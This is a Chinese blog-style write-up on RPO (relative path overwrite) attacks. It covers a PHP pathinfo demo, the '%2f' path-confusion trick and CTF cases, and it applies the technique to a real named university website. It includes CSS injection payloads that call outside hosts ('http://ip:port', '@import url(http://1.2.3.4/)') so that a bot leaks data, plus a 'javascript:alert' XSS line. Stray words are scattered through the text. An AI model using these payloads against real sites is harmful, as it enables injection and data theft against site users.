最近见到几个题,了解到一种攻击方式,就是有RPO攻击javascript
浏览器解析页面路径有误而致使css文件加载路径错误,从而引起的任意解析。php
引子:
1.在php有些框架中会有些pathinfo模式的url,就像http://localhost/index.php/home/user/login/var/value/ 若是此时页面须要加载css,同时是以一个相对路径进行加载,会出现什么问题呢?css
2.有时url例如这样http://test.com/a/b/c/d/e/f.html 的时候,若是
我访问的是html
针对上面的问题,我简单的写了一个demon测试了一下java
php代码api
<?php $path='http://localhost/hello/'?> <a class="navbar-brand" href="<?php echo $path?>url.php">三国杀</a> <li class="active" id='wei'><a href="<?php echo $path?>url.php/country/wei">魏</a></li> <li id ='shu'><a href="<?php echo $path?>url.php/country/shu">蜀</a></li> <li class="active" id='wu'><a href="<?php echo $path?>url.php/country/wu">吴</a></li> <link rel="stylesheet" href="./style.css" style="css" /> <?php $arr=isset($_SERVER['PATH_INFO'])?explode('/',trim($_SERVER['PATH_INFO'],'/')):null; //var_dump($arr); //echo $arr $value=''; for($_=0;$_<count($arr);$_+=2) { $value[$arr[$_]] = $arr[$_+1]; } $value['country']=isset($value['country'])?$value['country']:null; switch ($value['country']) { case 'wei': ?> <h1>welcome to 魏国!</h1> <?php break; case 'shu': ?> <h1>welcome to 蜀国!</h1> <?php break; case 'wu': ?> <h1>welcome to 吴国!</h1> <?php break; default: ?> <h1>welcome!</h1> <?php break; } ?>
style.css文件浏览器
h1 { font-size:180px; color:blue; }
注意这里css文件加载是以一个相对路径加载的服务器
<link rel="stylesheet" href="./style.css" style="css" />
框架
这里传参是利用/
来进行分割,发现直接打开页面是没有问题的。
xss
可是发现若是有传参的话,就出现问题了。
是哪里的问题?
在这里浏览器误觉得咱们参数的键/country/是一个实际的路径,从而致使实际加载的css文件路径就成了
http://localhost/hello/url.php/country/style.css
在这里服务端收到的请求会认为请求/country/style.css是一个键为country值为style.css的参数,从而返回页面。
说究竟是要实际利用的,以前的例子只是说明了,咱们能够打乱他的css的路径使其不能正常显示,那么若是那个加载的css咱们能够控制就行了,这里就是用了一个小技巧,下面借鉴国外的一篇文章的分析
css文件路径为../../styles.css,URL写为
http://www.google.com/tools/toolbar/buttons/apis%2fhowto_guide.html
返回正确
服务器接收到的是/tools/toolbar/buttons/apis/howto_guide.html
浏览器接收到的是/tools/toolbar/buttons/apis%2fhowto_guide.html
页面中导入的样式表 为/tools ~~/toolbar/buttons/../../~~ style.css
浏览器认为style.css的根目录是tools/toolbar/buttons
,而不是tools/toolbar/button/apis
因此../../style.css跳到了更高一级的目录下
这个就比较有意思了,style.css是往上跳两级,若是咱们在这两级中加个/tools/toolbar/a/..%2fbuttons/apis/howto_guide.html这样,服务器收到这里的是/tools/toolbar/ a/../ buttons/apis/howto_guide.html至关于没有加,可是浏览器依然觉得/..%2f和后面的是一个路径这样的话咱们就使加载的css文件是在一个咱们本身构造的文件夹a中了
这样有啥子用处呢?
首先要了解的是,浏览器解析css文件是兼容性比较高的,他不去关注那些杂乱的字符,只要咱们能够空出一行或者能够分割杂乱字符就能够了,好比asda{}body {background: url(./aaa.jpg);}asfa
这样就能够正确的加载。
其次,若是在网站里还有一处评论留言 或者搜索能使页面的部份内容是咱们能够控制的话,咱们能够构造css的语句,而后使加载的css文件能够跳到这里,即可以控制页面css的样式了。
下面举一个例子,仍是学校的某处网站(http://xsc.cuit.edu.cn/WebSite/Web/SearchList-Title~111.html
)。
这里的搜索的参数是直接在url的,我首先想了想若是咱们搜索a/c/这样的话浏览器会不会认为这都是路径从而乱套啊,试了一下发现服务器考虑到这个问题,我输入一个/他就会多跳一级。
(想了想这种方式仍是比较脆弱的,若是我是两个连续的/浏览器并不会认为这是两级目录,可是服务器却会返回调两级的地址。)
咱们这时候还须要找一个能够插入payload的页面http://xxxx/WebSite/Web/NewsList_Wyls.html
分析一下,咱们源页面路径是/WebSite/Web/SearchList-Title~111.html,如今须要跳转到/WebSite/Web/NewsList_Wyls.html,若是把NewsList_Wyls.html当成目录的话,那只须要跳一级就能够了,最后构造的url是http://xsc.cuit.edu.cn/WebSite/Web/NewsList_Wyls.html/..%2fSearchList-Title~33s.html
能够看到具体加载的css文件成功的转到咱们须要的页面了
惋惜的是这里并无成功渲染,我把加载的css源码拖到本地执行,是有效的,不晓得为啥子这里就不行了。可是总的攻击流程大概就是这样。
最近有CTF就是利用的这个攻击方式的,pwnhub上的那个流程和以前相似,最后就是在user页面写{}*{backgorund: url('http://ip:port');}而后构造好url提交给bot而后等bot访问后加载css就ok了,说实话这种利用方式感受并无什么实际的用处。
在http://117.34.111.15:3000,这道题中就比较有意思了,贴一下出题人的wp
思路至关能够,差很少就是利用未闭合的单引号来包裹源码,经过访问的url读取源码。
这里有些坑感受,因为对css语法并非很了解,有空了在研究研究看看。
常见的能够加载加载远程文件的方法
{} @import url('http://1.2.3.4/');
或者加载背景
{}body {background: url(http://ip:port);}
以前看到能够经过这种css的方式加载图片background-image:url(data:image/gif;base64,R0lGODlhAQAcALMAAMXh96HR97XZ98Hf98Xg97DX97nb98Lf97vc98Tg973d96rU97ba97%2Fe96XS9wAAACH5BAAAAAAALAAAAAABABwAAAQVMLhVBDNItXESAURyDI2CGIxQLE4EADs%3D);
我想是否是能够尝试加载js代码?
相似于data类型的地址有以下:
data:text/plain,<文本数据> data:text/html,<HTML代码> data:text/html;base64,<base64编码的HTML代码> data:text/css,<CSS代码> data:text/css;base64,<base64编码的CSS代码> data:text/javascript,<Javascript代码> data:text/javascript;base64,<base64编码的Javascript代码> data:image/gif;base64,base64编码的gif图片数据 data:image/png;base64,base64编码的png图片数据 data:image/jpeg;base64,base64编码的jpeg图片数据 data:image/x-icon;base64,base64编码的icon图片数据
还有这样javascript:alert('xss');
发现这样并不会解析。
留着之后发现新姿式在利用吧。